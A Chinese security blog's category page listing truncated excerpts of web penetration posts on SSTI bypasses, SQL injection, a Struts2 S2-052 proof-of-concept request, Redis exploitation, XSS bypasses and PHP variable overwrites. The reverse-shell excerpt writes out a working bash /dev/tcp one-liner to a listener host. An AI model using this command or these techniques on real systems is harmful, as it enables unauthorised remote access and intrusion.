分类 Web渗透 下的文章:

Flask/Jinja2模板注入中的一些绕过姿势
发表于: | 分类: Web渗透,技术分享 | 评论:1 | 阅读: 1989
好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。 0x00 获取基本类 首先通过str、dict、tuple或list获取pyt...

阅读全文>>

SQL注入备忘手册(更新2017-12-11)
发表于: | 分类: Web渗透,技术分享 | 评论:9 | 阅读: 3035
SQL备忘录,平时查阅用,随时更新。 1 MySQL 1.1 常用信息及语句 当前用户:user() 数据库版本:version() 数据库名: database() 操作系统:@@version_compile_os 所有用户: select group_con...

阅读全文>>

S2-052 POC
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1221
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1 Host: 192.168.2.108:8080 User-Agent: Mozil...

阅读全文>>

利用order by 进行盲注
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1983
0x01 利用场景 登录代码: $username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql=&q...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 3478
0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1268
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=12...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1154
0x00 前言 本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家 0x01 分析 1、无安全方面的限制,直接使用 关键代码: <?php @$id = $_GET['id']; echo $id; payload: <sc...

阅读全文>>

PHP变量覆盖漏洞总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1316
一、全局变量覆盖 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。 <?php echo "Register_globals: ".(int)ini_get("regi...

阅读全文>>